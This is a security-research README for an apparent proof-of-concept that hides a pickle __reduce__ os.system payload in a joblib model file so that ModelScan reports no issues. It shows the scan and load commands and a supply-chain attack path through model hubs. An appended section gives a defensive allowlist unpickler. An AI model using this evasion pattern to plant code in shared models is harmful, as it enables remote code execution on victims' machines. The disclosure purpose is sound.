# ModelScan Bypass - Memory-Mapped Array ⭐ PRIMARY FINDING

**Security Research - ModelScan Bypass Technique**

## Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. The technique allows malicious pickle-based model files to evade detection.

## Technique

**Memory-mapped array bypass**

Uses joblib's memmap feature together with a malicious `__reduce__` method.

## ModelScan Result

**SCANNED but found NO ISSUES ✅ (TRUE BYPASS)**

## File

- `exploit_memmap_bypass.joblib`

## Reproduction Steps

### Testing with ModelScan

```bash
# Install ModelScan
pip install modelscan

# Download the exploit file from this repository, then scan it
modelscan scan -p exploit_memmap_bypass.joblib
```

### Expected Result

SCANNED but found NO ISSUES ✅ (TRUE BYPASS)

### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

```python
import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_memmap_bypass.joblib')
```

## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```

**Why ModelScan misses this:** the payload is delivered through joblib's memmap feature together with a malicious `__reduce__` method.

## Security Impact

**Severity**: HIGH

**Attack Vector**:

1. Attacker creates a malicious model using this technique
2. Uploads it to a model hub (HuggingFace, etc.)
3. Victim downloads the model and scans it with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads the model → RCE

## Part of Larger Research

This is one of four bypass techniques discovered:

1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch)
2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression)
3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header)
4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING

## Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

**Date**: December 25, 2024

**Researcher**: Security Research Team

## References

- [Huntr Bug Bounty](https://huntr.com/)
- [ModelScan GitHub](https://github.com/protectai/modelscan)

## Disclaimer

⚠️ **For Security Research Only**

This file is provided for security research and vulnerability disclosure purposes only. Do not use this technique for malicious purposes. Loading this file will execute code.

---

**Status**: Under responsible disclosure to Huntr bug bounty program
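Added example, not one of this repository's files: a defender-side loader that rejects any pickle global outside an allowlist, so a `__reduce__` payload like the one in Technical Details is stopped at the "Victim loads the model" step no matter what a scanner reported. It uses the standard library `pickle` module rather than `joblib.load`; the allowlist, the `_CallOnLoad` stand-in class and the sample pickles are constructed for the demo.

```python
import io
import os
import pickle

# Constructed allowlist for the demo; a real deployment enumerates the
# (module, name) pairs its own model files legitimately need.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("numpy", "ndarray"),
    ("numpy", "dtype"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Every GLOBAL / STACK_GLOBAL opcode resolves through find_class,
    so a __reduce__ payload (e.g. os.system) never gets a callable back."""

    def __init__(self, file):
        super().__init__(file)
        self.requested = []  # every (module, name) the stream asked for

    def find_class(self, module, name):
        self.requested.append((module, name))
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data: bytes):
    """Return (object, requested_globals); raises UnpicklingError on a block."""
    up = RestrictedUnpickler(io.BytesIO(data))
    return up.load(), up.requested


def load_result(data: bytes) -> str:
    """Classify a pickle stream as 'loaded' or 'blocked:<module>.<name>'."""
    try:
        safe_loads(data)
        return "loaded"
    except pickle.UnpicklingError as exc:
        return "blocked:" + str(exc).split()[-1]


class _CallOnLoad:
    """Stand-in for the page's payload class: same call-on-load pattern,
    but pointed at a harmless os function so the demo is safe to run."""

    def __reduce__(self):
        return (os.getenv, ("HOME",))


BENIGN_PICKLE = pickle.dumps({"weights": [0.1, 0.2, 0.3]})  # constructed sample
PAYLOAD_PICKLE = pickle.dumps(_CallOnLoad())                 # constructed sample
```

A plain data pickle carries no globals and loads; the call-on-load pickle is refused with `blocked:os.getenv` before any callable is resolved.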